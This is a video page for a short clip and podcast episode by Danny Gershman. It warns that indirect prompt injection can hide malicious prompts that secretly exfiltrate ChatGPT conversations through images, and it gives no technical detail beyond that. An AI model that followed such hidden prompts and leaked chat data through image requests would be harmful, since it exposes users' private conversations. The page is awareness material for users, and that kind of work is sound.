Data Exfiltration Risks Through ChatGPT Conversations
Learn how indirect prompt injection can secretly extract your chat data via images in ChatGPT. Stay informed and protect your information.

Danny Gershman
671 views • Sep 23, 2025

About this video
Did you know your ChatGPT chats could be at risk? 🚨 Indirect prompt injection can secretly exfiltrate your conversations through images! Stay aware & protect your data. 🔒 Watch out for malicious prompts hiding in plain sight. #CyberSecurity #AIrisks #StaySafe
Apple: https://podcasts.apple.com/us/podcast/episode-8-llm-caching/id1825463283?i=1000728096532
Spotify: https://open.spotify.com/episode/33GFMhx0j5yjzzEf3NWgoJ?si=iqzVya23R8Gvg6LQ8qUbtw
Youtube: https://youtu.be/p-v89TrUnhM #shorts
Apple: https://podcasts.apple.com/us/podcast/episode-8-llm-caching/id1825463283?i=1000728096532
Spotify: https://open.spotify.com/episode/33GFMhx0j5yjzzEf3NWgoJ?si=iqzVya23R8Gvg6LQ8qUbtw
Youtube: https://youtu.be/p-v89TrUnhM #shorts
Video Information
Views
671
Likes
3
Duration
0:35
Published
Sep 23, 2025
Related Trending Topics
LIVE TRENDSRelated trending topics. Click any trend to explore more videos.